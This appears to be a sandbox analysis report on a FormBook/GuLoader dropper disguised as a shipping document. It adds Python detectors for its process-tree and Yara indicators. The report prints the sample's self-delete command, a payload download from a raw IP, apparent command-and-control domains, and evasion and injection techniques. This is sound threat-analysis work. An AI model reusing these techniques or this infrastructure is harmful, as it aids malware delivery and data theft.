Analysis Report AWB_&_Shipping Doc.bat

Overview

General Information

Sample Name:AWB_&_Shipping Doc.bat (renamed file extension from bat to exe)
Analysis ID:297924
MD5:6386849f8a478fd08477053700ee3ea3
SHA1:1c8da40fedbdf778bdce0b580ad2dfb34c829ec7
SHA256:1c81f41c9117ff33b9ef73de5b6e429b571bae3393b8ce9bd4f3f28ba48b276b

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • AWB_&_Shipping Doc.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
    • AWB_&_Shipping Doc.exe (PID: 6204 cmdline: 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 1968 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6252 cmdline: /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
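The chain above (the sample re-launching itself, code running inside explorer.exe, an argument-less cscript.exe, then cmd.exe deleting the original file) is the kind of sequence endpoint telemetry can catch even though no Sigma rule matched in this run. The Python below is an added example, not part of the Joe Sandbox report: it runs two checks over constructed process-creation events modelled on the Startup tree (PIDs, image names and command lines are taken from the tree; the root PPID, the explorer.exe path and the full cmd.exe image path are assumed). Note that a sensor would not show explorer.exe as a child of the sample; the report draws it there because the sample injected into the already-running explorer.exe (see the "Maps a DLL or memory area into another process" and "Queues an APC in another process" signatures), so the checks key on what a sensor does record: a script host started with no script, and a cmd.exe that deletes the image of one of its own ancestors.

```python
"""Two process-tree checks modelled on the chain in this report.

Added example, not Joe Sandbox code. Events are constructed: PIDs, image names
and command lines come from the Startup tree above; the root PPID, the
explorer.exe path and the full image path of cmd.exe are assumed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executing image
    cmdline: str   # command line exactly as the sensor logged it


SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}

# First token of a Windows command line: 'quoted', "quoted" or bare; the rest are arguments.
_FIRST_TOKEN = re.compile(r"""^\s*(?:'[^']*'|"[^"]*"|\S+)\s*(?P<rest>.*)$""", re.S)
# Target of a del command: 'quoted', "quoted" or a bare path.
_DEL_TARGET = re.compile(r"""\bdel\b\s+(?:(?P<q>['"])(?P<quoted>.*?)(?P=q)|(?P<bare>\S+))""", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Everything after the image token; empty when the process was started with none."""
    m = _FIRST_TOKEN.match(cmdline)
    return m.group("rest").strip() if m else ""


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent, grandparent, ... as far as the event set reaches (cycle-safe)."""
    chain, seen = [], {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, detail) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[int, str, str]] = []
    for ev in events:
        name, args = basename(ev.image), arguments(ev.cmdline)
        # Rule 1: a script host with no script to run. cscript/wscript carry a script
        # path in normal use; an empty command line is what a hollowed host looks like.
        if name in SCRIPT_HOSTS and not args:
            parent = by_pid.get(ev.ppid)
            hits.append((ev.pid, "script_host_without_script",
                         f"{name} launched by {basename(parent.image) if parent else '?'} with no arguments"))
        # Rule 2: cmd.exe /c del <path> where <path> is the image of one of its ancestors,
        # i.e. the dropper removing itself after handing execution to an injected process.
        if name == "cmd.exe":
            m = _DEL_TARGET.search(args)
            if m:
                target = (m.group("quoted") or m.group("bare")).lower()
                for anc in ancestors(ev, by_pid):
                    if anc.image.lower() == target:
                        hits.append((ev.pid, "cmd_deletes_ancestor_image",
                                     f"deletes {anc.image} (pid {anc.pid})"))
                        break
    return hits


SAMPLE = r"C:\Users\user\Desktop\AWB_&_Shipping Doc.exe"
# Constructed from the Startup tree above; PPID 4000, the explorer.exe path and the
# cmd.exe image path are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(7088, 4000, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(6204, 7088, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(3388, 6204, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1968, 3388, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(6252, 1968, r"C:\Windows\SysWOW64\cmd.exe",
              rf'"C:\Windows\SysWOW64\cmd.exe" /c del "{SAMPLE}"'),
    ProcEvent(2296, 6252, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

Against the constructed events the two rules fire on PIDs 1968 and 6252 only; the sample's own re-launch and conhost.exe stay quiet, which is the point of anchoring the second rule on the ancestor's image rather than on `del` alone.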

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)
0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x86e0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x8624:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
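The Yara rows above are byte-pattern matches over process memory dumps. To show what they key on, here is an added Python scanner (not code from the report or from the rule authors) that searches a buffer for the Formbook_1 $sequence_0 bytes and the three JPCERT/CC sqlite3 pushes listed above and decodes the pushed immediates. $sequence_0 disassembles to add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax, the RDTSC timing check the "Tries to detect virtualization through RDTSC time measurements" signature refers to; each sqlite3 string is a push imm32 (68 xx xx xx xx) of a 32-bit constant, and the rule's string names say which sqlite3 API each stands for. The memory image it scans is constructed (NOP filler with the patterns placed at chosen offsets), and the "RDTSC sequence plus all three sqlite3 pushes" condition is this example's, not the published rules' condition; in production you would run the rules themselves with yara or yara-python.

```python
"""Byte-pattern matching behind the Yara rows above, re-implemented in plain Python.

Added example, not code from the report or from the rule authors. The scanned
memory image is constructed; the match condition is this example's own.
"""
import struct
from typing import Dict, List

# Hex strings copied from the Yara overview above.
PATTERNS: Dict[str, str] = {
    # Formbook_1 $sequence_0: add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax
    "sequence_0":  "03 C8 0F 31 2B C1 89 45 FC",
    # JPCERT/CC Formbook: each is push imm32 (opcode 0x68) of a 4-byte constant
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}
SQLITE_PUSHES = ("sqlite3step", "sqlite3text", "sqlite3blob")


def hex_to_bytes(spaced_hex: str) -> bytes:
    return bytes.fromhex(spaced_hex.replace(" ", ""))


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset at which needle occurs in buf (overlapping hits included)."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def scan(buf: bytes) -> Dict[str, List[int]]:
    """Offsets of every pattern, in the shape of the report's '0x98e8:$sequence_0' rows."""
    return {name: find_all(buf, hex_to_bytes(hx)) for name, hx in PATTERNS.items()}


def pushed_imm32(buf: bytes, offset: int) -> int:
    """Decode the little-endian immediate of a `push imm32` (0x68) at offset."""
    if buf[offset] != 0x68:
        raise ValueError(f"no push imm32 at {offset:#x}")
    return struct.unpack_from("<I", buf, offset + 1)[0]


def looks_like_formbook(buf: bytes) -> bool:
    """Example condition (not the published rules'): RDTSC sequence plus all three sqlite3 pushes."""
    hits = scan(buf)
    return bool(hits["sequence_0"]) and all(hits[n] for n in SQLITE_PUSHES)


def build_sample_image() -> bytes:
    """Constructed stand-in for a memory dump: NOP filler with the patterns at chosen offsets."""
    image = bytearray(b"\x90" * 0x200)
    image[0x10:0x19] = hex_to_bytes(PATTERNS["sequence_0"])
    image[0x80:0x85] = hex_to_bytes(PATTERNS["sqlite3step"])
    image[0xA0:0xA5] = hex_to_bytes(PATTERNS["sqlite3text"])
    image[0xC0:0xC5] = hex_to_bytes(PATTERNS["sqlite3blob"])
    return bytes(image)


if __name__ == "__main__":
    img = build_sample_image()
    for name, offsets in scan(img).items():
        for off in offsets:
            extra = f" -> push {pushed_imm32(img, off):#010x}" if name in SQLITE_PUSHES else ""
            print(f"{off:#x}:${name}{extra}")
    print("formbook indicators present:", looks_like_formbook(img))
```

The decoded immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what you would pivot on when the surrounding bytes are re-packed: a loader that rebuilds the same resolved-API table will still push the same constants even if the code around them changes.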

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: AWB_&_Shipping Doc.exe; Virustotal: Detection: 11%
    Yara detected FormBook
    Source: Yara match; File source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match; File source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop esi 11_2_004172F7

    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49720 -> 192.210.146.118:80
    Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49746
    Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49747
    Source: global traffic; HTTP traffic detected: GET /u2e/?J6A=fOOvFeCRGZilV5FD1+mHhwrLgezxAS8nC209VBcY21t/5KoEoUJzgkM0WV81yJyaD6Gl&YL3=9rN46F HTTP/1.1 | Host: www.nacesiti.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic; HTTP traffic detected: GET /u2e/?J6A=V7ZtMDwObpOpn50+hc8lwEJpQXPQmbRBnH5Le+G+KvZbJWeIncKybJk7aoLw9MwxtSCc&YL3=9rN46F HTTP/1.1 | Host: www.catearhelmet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: Joe Sandbox View; IP Address: 23.227.38.64
    Source: Joe Sandbox View; IP Address: 34.102.136.180
    Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
    Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View; ASN Name: GOOGLEUS
    Source: global traffic; HTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 192.210.146.118 | Cache-Control: no-cache
    Source: global traffic; HTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 192.210.146.118 | Cache-Control: no-cache
    Source: global traffic; HTTP traffic detected: GET /u2e/?J6A=fOOvFeCRGZilV5FD1+mHhwrLgezxAS8nC209VBcY21t/5KoEoUJzgkM0WV81yJyaD6Gl&YL3=9rN46F HTTP/1.1 | Host: www.nacesiti.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: global traffic; HTTP traffic detected: GET /u2e/?J6A=V7ZtMDwObpOpn50+hc8lwEJpQXPQmbRBnH5Le+G+KvZbJWeIncKybJk7aoLw9MwxtSCc&YL3=9rN46F HTTP/1.1 | Host: www.catearhelmet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
    Source: unknown; DNS traffic detected: queries for: www.nacesiti.com
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmp; String found in binary or memory: http://192.210.146.118/
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297437420.0000000000A17000.00000004.00000020.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmp; String found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.bin
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297437420.0000000000A17000.00000004.00000020.sdmp; String found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.binR
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmp; String found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.biny
    Source: explorer.exe, 00000003.00000000.275063026.0000000008A3C000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.2794moraga.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.2794moraga.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.2794moraga.com/u2e/www.pinacle.online
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.2794moraga.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.6936399.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.6936399.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.6936399.com/u2e/www.onehealthtaskforce.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.6936399.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.adesignmuseum.net
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.adesignmuseum.net/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.adesignmuseum.net/u2e/www.jsbdistributor.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.adesignmuseum.netReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.ahyqmux.icu
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.ahyqmux.icu/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.ahyqmux.icu/u2e/www.worstcasebestcase.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.ahyqmux.icuReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.baisongke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.baisongke.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.baisongke.com/u2e/j
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.baisongke.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.catearhelmet.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.catearhelmet.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.catearhelmet.com/u2e/www.2794moraga.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.catearhelmet.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.colettesimonepsyd.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.colettesimonepsyd.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.colettesimonepsyd.com/u2e/www.ahyqmux.icu
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.colettesimonepsyd.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.daveadonai.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.daveadonai.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.daveadonai.com/u2e/www.adesignmuseum.net
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.daveadonai.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.jsbdistributor.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.jsbdistributor.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.jsbdistributor.com/u2e/www.baisongke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.jsbdistributor.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.moneysavingexpertmonarch.xyz
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.moneysavingexpertmonarch.xyz/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.moneysavingexpertmonarch.xyz/u2e/www.6936399.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.moneysavingexpertmonarch.xyzReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.nacesiti.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.nacesiti.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.nacesiti.com/u2e/www.catearhelmet.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.nacesiti.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.onehealthtaskforce.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.onehealthtaskforce.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.onehealthtaskforce.com/u2e/www.theselfunknown.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.onehealthtaskforce.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.pinacle.online
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.pinacle.online/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.pinacle.online/u2e/www.moneysavingexpertmonarch.xyz
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.pinacle.onlineReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.severbroke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.severbroke.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.severbroke.com/u2e/www.colettesimonepsyd.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.severbroke.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.theselfunknown.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.theselfunknown.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.theselfunknown.com/u2e/www.severbroke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.theselfunknown.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.worstcasebestcase.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmp; String found in binary or memory: http://www.worstcasebestcase.com/u2e/
